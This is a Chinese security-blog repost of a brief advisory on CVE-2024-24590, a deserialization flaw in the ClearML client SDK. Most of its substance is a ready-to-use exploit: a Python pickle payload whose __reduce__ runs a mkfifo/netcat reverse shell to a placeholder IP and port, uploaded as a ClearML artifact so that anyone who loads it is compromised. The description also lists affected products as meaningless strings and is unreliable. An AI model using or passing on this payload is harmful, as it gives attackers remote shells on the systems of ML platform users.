CVE-2024-24590 | 反序列化

admin 2024年7月3日14:50:35评论17 views字数 839阅读2分47秒阅读模式

使使使

影响描述

    CVE-2024-24590是Allegro AI的ClearML平台的客户端SDK版本0.17.0至1.14.2中的一个漏洞,该漏洞允许对不受信任的数据进行反序列化。攻击者可以利用此漏洞上传恶意工件,使其能够在与用户的系统交互时执行任意代码。受影响的产品包括umfRWe、umfRWc、umfRWd和umfRWb。该漏洞的风险评分为66,表明其严重程度很高,可能会对系统的机密性和完整性产生重大影响。

poc&exp

from clearml import Taskimport pickle, osclass RunCommand:    def __reduce__(self):        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc **IP** **PORT** >/tmp/f',))command = RunCommand()task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=["review"])task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True, extension_name=".pkl")

CVE-2024-24590 | 反序列化

CVE-2024-24590 | 反序列化

原文始发于微信公众号(漏洞猎人):CVE-2024-24590 | 反序列化

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日14:50:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-24590 | 反序列化https://cn-sec.com/archives/2841282.html

发表评论

匿名网友 填写信息